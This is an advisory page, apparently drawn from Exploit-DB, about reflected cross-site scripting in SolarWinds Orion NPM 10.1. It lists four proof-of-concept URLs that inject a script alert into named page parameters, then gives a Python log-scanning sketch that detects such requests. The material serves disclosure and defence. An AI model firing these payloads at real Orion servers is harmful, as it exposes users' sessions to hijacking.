vendor: Orion Network Performance Monitor (NPM)
by:
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting)
Product Name: Orion Network Performance Monitor (NPM)
Affected Version From: SolarWinds Orion Network Performance Monitor (NPM) 10.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:solarwinds:orion_network_performance_monitor:10.1
Metasploit:
Other Scripts:
Platforms Tested:

SolarWinds Orion NPM Multiple Cross-Site Scripting Vulnerabilities

SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to apply the latest security patches provided by SolarWinds. Additionally, users should be cautious when clicking on suspicious links and ensure they are running the latest version of SolarWinds Orion NPM.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45257/info

SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

SolarWinds Orion Network Performance Monitor (NPM) 10.1 is vulnerable; other versions may also be affected. 

http://www.example.com/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-2312700225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http://www.example.com/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http://www.example.com/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&I:100&view=InterfaceDetails

http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&RYSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=
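
Detection sketch for the four page/parameter pairs listed above. This is an added example, not part of the advisory or of any SolarWinds tooling. The log line layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qsl

# Pages and query parameters taken from the advisory's example URLs.
REFLECTED_PARAMS = {
    "/orion/netperfmon/mapview.aspx": {"title"},
    "/orion/netperfmon/nodedetails.aspx": {"netobject"},
    "/orion/npm/interfacedetails.aspx": {"netobject"},
    "/orion/netperfmon/customchart.aspx": {"chartname"},
}
# Characters that let a reflected value break out of HTML text or an attribute.
# Heuristic: a legitimate title containing an apostrophe is flagged too.
MARKUP = re.compile(r"[<>\"']")

def suspicious_params(request_uri):
    """Return [(param, decoded_value)] for advisory parameters carrying markup."""
    parts = urlsplit(request_uri)
    watched = REFLECTED_PARAMS.get(parts.path.lower())
    if not watched:
        return []
    hits = []
    # parse_qsl percent-decodes once, matching what the page receives.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in watched and MARKUP.search(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Yield (client_ip, param, html_encoded_value) for each flagged request."""
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client_ip, uri = fields[0], fields[2]
        for name, value in suspicious_params(uri):
            # HTML-encode the value so the finding is safe to render in a
            # report; the reflecting pages need the same output encoding.
            yield client_ip, name, escape(value, quote=True)

# Constructed sample lines, assumed layout: "<client-ip> <method> <request-uri>".
SAMPLE_LOG = [
    "192.0.2.10 GET /Orion/NetPerfMon/NodeDetails.aspx?NetObject=N:12",
    "192.0.2.77 GET /Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E",
    "192.0.2.77 GET /Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRT&Title=&NetObject=I:100",
    "192.0.2.78 GET /Orion/NetPerfMon/MapView.aspx?Map=site.OrionMap&Title=%3Cb%3Ex",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Adapt the field positions in `scan_log` to the actual web server log format before running it over real logs.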